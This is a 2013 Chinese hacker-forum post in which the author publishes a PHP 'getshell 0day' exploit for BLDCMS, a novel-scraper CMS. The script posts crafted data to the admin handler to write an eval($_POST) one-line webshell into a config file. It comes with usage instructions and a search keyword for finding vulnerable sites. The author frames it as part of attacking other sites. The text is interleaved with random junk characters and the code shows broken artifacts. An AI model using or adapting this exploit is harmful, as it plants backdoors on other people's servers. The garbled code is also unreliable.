之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞9 D/ m. s6 h: n* i& w
6 O" {7 T# W; r/ f' D ^
1 P6 ~- O1 k/ }7 G9 Q6 w+ h6 ?
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 * R6 D" V- P3 t4 {2 U7 f* l7 {8 Q
3 w& R3 d' s6 u% E
既然都有人发了 我就把我之前写好的EXP放出来吧
/ T: W$ ~4 y+ R+ Z
, m: w! \( [. |! Z r1 P5 iview source print?01.php;">2 z6 K1 ]* {9 a5 x1 ^. q* k- X: d
02.<!--?php
) Y& u2 p1 `0 s& @+ Q- K03.echo "-------------------------------------------------------------------1 b1 V- @5 u0 v' [) y+ ]7 w/ X' `
04.
. [) A6 s1 _3 z' ^+ i05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP$ z9 ^6 K! o0 e+ U6 |+ R% w( `
06. 1 F* q( [$ ]& y6 U
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
' p+ n* k) }/ V s08.
6 h% T) ]# f7 y. `% V9 U09.QQ:981009941\r\n 2013.3.21\r\n ) N7 }+ d/ M% z$ S" P
10. 5 t; t6 V$ q+ z
11. 9 v( `, T' R" [' a* a* |9 \5 @" U }
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
/ J" e3 N" k5 u5 r- H V R13.
: O; X( j! N+ @; A( x Z+ ?14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
. C: v) O( p6 K: }15.
, l, c9 K4 D- W4 }" F) x% D8 D16.--------------------------------------------------------------------\r\n";
9 \( i/ ^1 M0 t c2 Z: o17.$url=$argv[1];
r+ C* A6 {0 J& B' z/ }18.$dir=$argv[2];
$ d7 A' D! O0 l19.$pass=$argv[3];: }" u- L! q/ Z& m: g
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';* n, z! q1 K9 { _; D
21.if (emptyempty($pass)||emptyempty($url)) b% ?' `2 i9 Z! k# d
22.{exit("请输入参数");}$ s6 o: W% V' t+ j* M$ t* S) `
23.else
$ q& ~& @7 a& h7 C2 _24.{$ K! m7 w- k, K, Y3 }& M! H2 [2 c
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
! c2 e! j" j1 x+ [26.
* R7 Y: r5 O9 V6 J27.al;" R1 n/ P: Q8 K4 ?
28.$length = strlen($fuckdata);5 [3 O. j- p2 H
29.function getshell($url,$pass)
+ j# b0 p. T# N e4 n, j' {3 `2 G30.{
7 G+ _6 H! x7 z31.global $url,$dir,$pass,$eval,$length,$fuckdata;
# E1 a6 d5 W( J) W0 U32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";4 P% o; f+ j" w4 o" ]
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";. j8 V3 {3 j9 P Y6 J! x7 U0 t
34.$header .= "User-Agent: MSIE\r\n";- H" G, Z: C) v4 r) g2 D" N" V' W% B1 f
35.$header .= "Host:".$url."\r\n";- G K: e& n' T$ w F" S g$ ]
36.$header .= "Content-Length: ".$length."\r\n";5 B s: J# ^) s
37.$header .= "Connection: Close\r\n";
~/ \+ Z3 q8 {5 Y: `38.$header .="\r\n";
! E. w4 U9 u4 x2 o9 R39.$header .= $fuckdata."\r\n\r\n";: M/ q- Z6 g& n+ _& _! L8 T; H
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
, y% M! t |$ q& k% o! O41.if (!$fp)
$ T8 v& w4 K( Z1 ~, `/ y42.{) x+ ^% A) g7 t, Y# o
43.exit ("利用失败:请检查指定目标是否能正常打开");; e2 W: z/ s6 t1 f- y
44.}
; f" F# o2 Z7 Q8 l6 n45.else{ if (!fputs($fp,$header)): `- G, |, C1 i
46.{exit ("利用失败");}
& s/ d- x# F" I' p" j( q47.else6 u- J* v& c. [. T3 B$ ?1 j
48.{
6 q p- E2 a9 k49.$receive = '';
+ s6 o7 E, ?1 T% p" O. k7 ]- A- k50.while (!feof($fp)) {! t! Q# |: Q( `
51.$receive .= @fgets($fp, 1000);
. e) j( ^( V w) F5 T; ]52.}7 F2 O( M9 T9 ?6 g, m1 B9 ~
53.@fclose($fp);6 b. R7 Y2 g/ h5 l2 z o+ ~
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
' K6 ^! t% g0 m6 K/ `6 l55. " a# e# [0 I- A" r
56.GPC是否=off)";/ H( k D" w$ M3 D+ N
57.}}
7 n% p0 d1 W+ B0 g/ v# ~58.}
% e e# G3 R0 q4 H: S# A6 b59.}
' C$ ]+ N" S8 `' g. b60.getshell($url,$pass);5 v+ s* V! m- a' Y0 L$ }
61.?-->9 i, y7 Z. w7 _7 \5 r S6 i
1 \# h9 F2 q- ^( f5 c: H4 A k* w0 ?4 _4 N: [8 b! G9 z
x6 b2 N! D* v3 q$ R4 h; P
by 数据流
9 y( x2 `* l. d+ q) K; i |
发表于 2013-3-26 20:49:10
收藏
支持
反对